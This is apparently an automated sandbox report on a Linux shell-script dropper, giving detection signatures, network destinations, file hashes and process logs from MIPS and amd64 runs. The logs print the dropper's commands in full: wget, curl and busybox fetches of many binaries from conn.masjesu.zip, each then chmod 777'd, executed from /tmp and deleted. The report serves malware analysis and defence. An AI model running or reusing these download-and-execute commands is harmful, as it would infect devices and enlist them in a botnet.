Analysis Overview
SHA256
fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f
Threat Level: Shows suspicious behavior
The file fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-21 01:58
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-21 01:58
Reported
2024-10-21 02:01
Platform
debian9-mipsbe-20240418-en
Max time kernel
77s
Max time network
75s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
Processes
/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh
[/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/bin/chmod
[chmod 777 Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg
[./Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/bin/rm
[rm Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/bin/chmod
[chmod 777 aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2
[./aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/bin/rm
[rm aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/bin/chmod
[chmod 777 eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5
[./eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/bin/rm
[rm eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/bin/chmod
[chmod 777 WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb
[./WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/bin/rm
[rm WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/bin/chmod
[chmod 777 f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8
[./f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/bin/rm
[rm f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/bin/chmod
[chmod 777 izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q
[./izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/bin/rm
[rm izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/bin/chmod
[chmod 777 fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL
[./fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/bin/rm
[rm fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/bin/chmod
[chmod 777 cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz
[./cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/bin/rm
[rm cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/bin/chmod
[chmod 777 s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8
[./s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/bin/rm
[rm s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/bin/chmod
[chmod 777 lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q
[./lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/bin/rm
[rm lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/bin/chmod
[chmod 777 WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh
[./WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/bin/rm
[rm WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/bin/chmod
[chmod 777 Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ
[./Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/bin/rm
[rm Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/bin/chmod
[chmod 777 lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3
[./lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/bin/rm
[rm lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/bin/chmod
[chmod 777 oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza
[./oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/bin/rm
[rm oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
Files
/tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-21 01:58
Reported
2024-10-21 02:01
Platform
debian9-mipsel-20240611-en
Max time kernel
80s
Max time network
82s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg | /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg | N/A |
| N/A | /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 | /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 | N/A |
| N/A | /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 | /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 | N/A |
| N/A | /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb | /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb | N/A |
| N/A | /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 | /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 | N/A |
| N/A | /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q | /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q | N/A |
| N/A | /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL | /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL | N/A |
| N/A | /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz | /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz | N/A |
| N/A | /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 | /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 | N/A |
| N/A | /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q | /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q | N/A |
| N/A | /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh | /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh | N/A |
| N/A | /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ | /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ | N/A |
| N/A | /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 | /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 | N/A |
| N/A | /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza | /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz | /usr/bin/curl | N/A |
Processes
/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh
[/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/bin/chmod
[chmod 777 Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg
[./Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/bin/rm
[rm Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/bin/chmod
[chmod 777 aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2
[./aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/bin/rm
[rm aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/bin/chmod
[chmod 777 eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5
[./eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/bin/rm
[rm eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/bin/chmod
[chmod 777 WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb
[./WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/bin/rm
[rm WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/bin/chmod
[chmod 777 f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8
[./f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/bin/rm
[rm f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/bin/chmod
[chmod 777 izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q
[./izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/bin/rm
[rm izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/bin/chmod
[chmod 777 fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL
[./fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/bin/rm
[rm fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/bin/chmod
[chmod 777 cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz
[./cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/bin/rm
[rm cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/bin/chmod
[chmod 777 s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8
[./s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/bin/rm
[rm s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/bin/chmod
[chmod 777 lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q
[./lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/bin/rm
[rm lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/bin/chmod
[chmod 777 WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh
[./WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/bin/rm
[rm WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/bin/chmod
[chmod 777 Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ
[./Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/bin/rm
[rm Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/bin/chmod
[chmod 777 lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3
[./lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/bin/rm
[rm lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/bin/chmod
[chmod 777 oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza
[./oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
/bin/rm
[rm oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-21 01:58
Reported
2024-10-21 02:01
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
148s
Max time network
129s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh
[/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg]
Network
